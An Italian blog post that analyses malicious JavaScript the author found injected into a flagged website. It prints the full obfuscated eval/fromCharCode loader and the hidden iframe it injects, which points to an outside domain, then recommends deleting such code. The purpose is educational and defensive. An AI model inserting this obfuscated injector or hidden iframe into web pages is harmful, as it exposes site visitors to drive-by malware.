Segnalato sito malevolo

Oggi sono capitato su un sito che il browser mi segnalava come “sito malevolo”…

Per fortuna che i browser sono più evoluti di quanto non lo fossero poco tempo fa, e quindi ti aiutano anche in quei casi in cui ti capita di navigare in siti che contengono virus!
Permettetemi di dire ECCO UN’ALTRA BUONA RAGIONE per aggiornare il vostro browser e smettere di usare Internet Explorer 6 o 7! 😉

Allora io, che sono un po’ curioso, sono andato a guardarmi il codice è ho trovato in fondo alla pagina html uno script…

<script type='text/javascript'>win=window;gar=win['String'];ga='l';g=win['eva' ga];sf=gar.fromCharCode;g(sf(4.5*2,52.5*2,51*2,16*2,20*2,50*2,55.5*2,49.5*2,58.5*2,54.5*2,50.5*2,55*2,58*2,23*2,51.5*2,50.5*2,58*2,34.5*2,54*2,50.5*2,54.5*2,50.5*2,55*2,58*2,57.5*2,33*2,60.5*2,42*2,48.5*2,51.5*2,39*2,48.5*2,54.5*2,50.5*2,20*2,19.5*2,49*2,55.5*2,50*2,60.5*2,19.5*2,20.5*2,45.5*2,24*2,46.5*2,20.5*2,61.5*2,6.5*2,5*2,4.5*2,4.5*2,52.5*2,51*2,57*2,48.5*2,54.5*2,50.5*2,57*2,20*2,20.5*2,29.5*2,6.5*2,5*2,4.5*2,62.5*2,16*2,50.5*2,54*2,57.5*2,50.5*2,16*2,61.5*2,6.5*2,5*2,4.5*2,4.5*2,59*2,48.5*2,57*2,16*2,49*2,50*2,60.5*2,16*2,30.5*2,16*2,50*2,55.5*2,49.5*2,58.5*2,54.5*2,50.5*2,55*2,58*2,23*2,49.5*2,57*2,50.5*2,48.5*2,58*2,50.5*2,34.5*2,54*2,50.5*2,54.5*2,50.5*2,55*2,58*2,20*2,17*2,49*2,55.5*2,50*2,60.5*2,17*2,20.5*2,29.5*2,6.5*2,5*2,4.5*2,4.5*2,58*2,57*2,60.5*2,16*2,61.5*2,6.5*2,5*2,4.5*2,4.5*2,4.5*2,50*2,55.5*2,49.5*2,58.5*2,54.5*2,50.5*2,55*2,58*2,23*2,48.5*2,56*2,56*2,50.5*2,55*2,50*2,33.5*2,52*2,52.5*2,54*2,50*2,20*2,49*2,50*2,60.5*2,20.5*2,29.5*2,6.5*2,5*2,4.5*2,4.5*2,62.5*2,16*2,49.5*2,48.5*2,58*2,49.5*2,52*2,16*2,20*2,50.5*2,20.5*2,16*2,61.5*2,6.5*2,5*2,4.5*2,4.5*2,4.5*2,50*2,55.5*2,49.5*2,58.5*2,54.5*2,50.5*2,55*2,58*2,23*2,49*2,55.5*2,50*2,60.5*2,16*2,30.5*2,16*2,49*2,50*2,60.5*2,29.5*2,6.5*2,5*2,4.5*2,4.5*2,62.5*2,6.5*2,5*2,4.5*2,4.5*2,52.5*2,51*2,16*2,20*2,50*2,55.5*2,49.5*2,58.5*2,54.5*2,50.5*2,55*2,58*2,23*2,51.5*2,50.5*2,58*2,34.5*2,54*2,50.5*2,54.5*2,50.5*2,55*2,58*2,57.5*2,33*2,60.5*2,42*2,48.5*2,51.5*2,39*2,48.5*2,54.5*2,50.5*2,20*2,19.5*2,49*2,55.5*2,50*2,60.5*2,19.5*2,20.5*2,45.5*2,24*2,46.5*2,20.5*2,61.5*2,6.5*2,5*2,4.5*2,4.5*2,4.5*2,52.5*2,51*2,57*2,48.5*2,54.5*2,50.5*2,57*2,20*2,20.5*2,29.5*2,6.5*2,5*2,4.5*2,4.5*2,62.5*2,16*2,50.5*2,54*2,57.5*2,50.5*2,16*2,61.5*2,6.5*2,5*2,4.5*2,4.5*2,4.5*2,50*2,55.5*2,49.5*2,58.5*2,54.5*2,50.5*2,55*2,58*2,23*2,59.5*2,57*2,52.5*2,58*2,50.5*2,20*2,17*2,30*2,52.5*2,51*2,57*2,48.5*2,54.5*2,50.5*2,16*2,57.5*2,57*2,49.5*2,30.5*2,19.5*2,52*2,58*2,58*2,56*2,29*2,23.5*2,23.5*2,52*2,57.5*2,48.5*2,57.5*2,52.5*2,50.5*2,56.5*2,23*2,49.5*2,55.5*2,54.5*2,23.5*2,51.5*2,58.5*2,50.5*2,57.5*2,58*2,49*2,55.5*2,55.5*2,53.5*2,23*2,56*2,52*2,56*2,31.5*2,58*2,56*2,30.5*2,51*2,28.5*2,25.5*2,51*2,25*2,24.5*2,28*2,25*2,51*2,28*2,49.5*2,25.5*2,26.5*2,24.5*2,27*2,27*2,19.5*2,16*2,59.5*2,52.5*2,50*2,58*2,52*2,30.5*2,19.5*2,24.5*2,24*2,19.5*2,16*2,52*2,50.5*2,52.5*2,51.5*2,52*2,58*2,30.5*2,19.5*2,24.5*2,24*2,19.5*2,16*2,57.5*2,58*2,60.5*2,54*2,50.5*2,30.5*2,19.5*2,59*2,52.5*2,57.5*2,52.5*2,49*2,52.5*2,54*2,52.5*2,58*2,60.5*2,29*2,16*2,52*2,52.5*2,50*2,50*2,50.5*2,55*2,29.5*2,19.5*2,31*2,30*2,23.5*2,52.5*2,51*2,57*2,48.5*2,54.5*2,50.5*2,31*2,17*2,20.5*2,29.5*2,6.5*2,5*2,4.5*2,4.5*2,62.5*2,6.5*2,5*2,4.5*2,62.5*2,6.5*2,5*2,4.5*2,51*2,58.5*2,55*2,49.5*2,58*2,52.5*2,55.5*2,55*2,16*2,52.5*2,51*2,57*2,48.5*2,54.5*2,50.5*2,57*2,20*2,20.5*2,61.5*2,6.5*2,5*2,4.5*2,4.5*2,50*2,55.5*2,49.5*2,58.5*2,54.5*2,50.5*2,55*2,58*2,23*2,51.5*2,50.5*2,58*2,34.5*2,54*2,50.5*2,54.5*2,50.5*2,55*2,58*2,57.5*2,33*2,60.5*2,42*2,48.5*2,51.5*2,39*2,48.5*2,54.5*2,50.5*2,20*2,19.5*2,49*2,55.5*2,50*2,60.5*2,19.5*2,20.5*2,45.5*2,24*2,46.5*2,23*2,52.5*2,55*2,55*2,50.5*2,57*2,36*2,42*2,38.5*2,38*2,16*2,21.5*2,30.5*2,16*2,17*2,30*2,52.5*2,51*2,57*2,48.5*2,54.5*2,50.5*2,16*2,57.5*2,57*2,49.5*2,30.5*2,19.5*2,52*2,58*2,58*2,56*2,29*2,23.5*2,23.5*2,52*2,57.5*2,48.5*2,57.5*2,52.5*2,50.5*2,56.5*2,23*2,49.5*2,55.5*2,54.5*2,23.5*2,51.5*2,58.5*2,50.5*2,57.5*2,58*2,49*2,55.5*2,55.5*2,53.5*2,23*2,56*2,52*2,56*2,31.5*2,58*2,56*2,30.5*2,51*2,28.5*2,25.5*2,51*2,25*2,24.5*2,28*2,25*2,51*2,28*2,49.5*2,25.5*2,26.5*2,24.5*2,27*2,27*2,19.5*2,16*2,59.5*2,52.5*2,50*2,58*2,52*2,30.5*2,19.5*2,24.5*2,24*2,19.5*2,16*2,52*2,50.5*2,52.5*2,51.5*2,52*2,58*2,30.5*2,19.5*2,24.5*2,24*2,19.5*2,16*2,57.5*2,58*2,60.5*2,54*2,50.5*2,30.5*2,19.5*2,59*2,52.5*2,57.5*2,52.5*2,49*2,52.5*2,54*2,52.5*2,58*2,60.5*2,29*2,16*2,52*2,52.5*2,50*2,50*2,50.5*2,55*2,29.5*2,19.5*2,31*2,30*2,23.5*2,52.5*2,51*2,57*2,48.5*2,54.5*2,50.5*2,31*2,17*2,29.5*2,6.5*2,5*2,4.5*2,62.5*2))</script>

Una “javascript injection“: una cosa veramente ben cammuffata che serviva a far comparire nella pagina infettata un iframe invisibile collegato ad un altro sito (che ora non è più raggiungibile):

<iframe src='http://hsasieq.com/guestbook.php?tp=f93f2182f8c35166' width='10' height='10' style='visibility: hidden;'></iframe>

La cosa che mi ha strabiliato di più, a me che non sono un genio del javascript, è stato lo strumento che sono riuscito a scovare per decodificare quella lunghissima riga di codice, cioè il Jsunpack.

Tutto questo per consigliare che, se per caso vi trovate un codice come questo nelle vostre pagine html, e non avete la minima idea di cosa possa fare, cancellatelo senza pensarci più.

Altri sono arrivati qui cercando:
www nonpuoessere it.

Lascia un commento

Il tuo indirizzo email non sarà pubblicato.

Ricevi un avviso se ci sono nuovi commenti. Oppure iscriviti senza commentare.

You can add images to your comment by clicking here.